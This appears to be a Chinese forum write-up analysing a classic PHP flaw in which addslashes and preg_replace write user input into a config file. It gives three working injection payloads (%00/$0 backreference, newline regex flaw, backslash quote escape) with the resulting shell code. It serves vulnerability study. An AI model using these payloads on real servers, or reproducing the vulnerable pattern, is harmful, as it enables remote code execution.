PHP正则经典漏洞
@author: DliveP牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞
漏洞代码是这样的:
<?php
//ph.php
$str = addslashes($_GET['option']);
$file = file_get_contents('option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
var_dump($file);
file_put_contents('option.php', $file);
<?php
//option.php
$option='123';
0x01 利用%00或$0
这是我当时利用的一个方法(感觉我这个方法绕了好大一个弯儿QAQ)
payload:
http://192.168.204.238/test/ph.php?option=;phpinfo();
http://192.168.204.238/test/ph.php?option=%00
第二次传入的%00换为$0可达到相同效果
参考php手册对\0或$0的描述:
http://php.net/manual/zh/function.preg-replace.php
\\0和$0代表完整的模式匹配文本
%00被addslashes()转为\0,而\0在preg_replace函数的第二个参数中代表“匹配到的全部内容”($0同理)
此时preg_replace要执行的代码如下
preg_replace('|\$option=\'.*\';|',"\$option='\\0';",$file); 或
preg_replace('|\$option=\'.*\';|',"\$option='$0';",$file); 即执行
preg_replace('|\$option=\'.*\';|',"\$option='$option=';phpinfo();';';",$file); 成功闭合单引号写入如下shell
<?php
$option='$option=';phpinfo();';';
0x02 利用换行符%0a和正则匹配缺陷
第一次传入 aaa';phpinfo();%0a//
此时文件内容
$option='aaa\';phpinfo();
//';
第二次传入随意字符串,如bbb, 正则代码.*会将匹配到的aaa\替换为bbb (正则匹配的缺陷)
此时文件内容(成功写入恶意代码)
$option='bbb';phpinfo();
//';
0x03 利用反斜杠转义单引号
payload:
http://192.168.204.238/test/ph.php?option=\';phpinfo();//
虽然addslashes将\转义为\\但是经过preg_replace处理后\\又变为了\
view-source:http://192.168.204.247/test/ph.php?option=\
string(19) "after addslashes:\\"
string(42) "second param of preg_replace:$option='\\';"
string(37) "after preg_replace:<?php
$option='\';"
最后的单引号被反斜杠转义
页:
[1]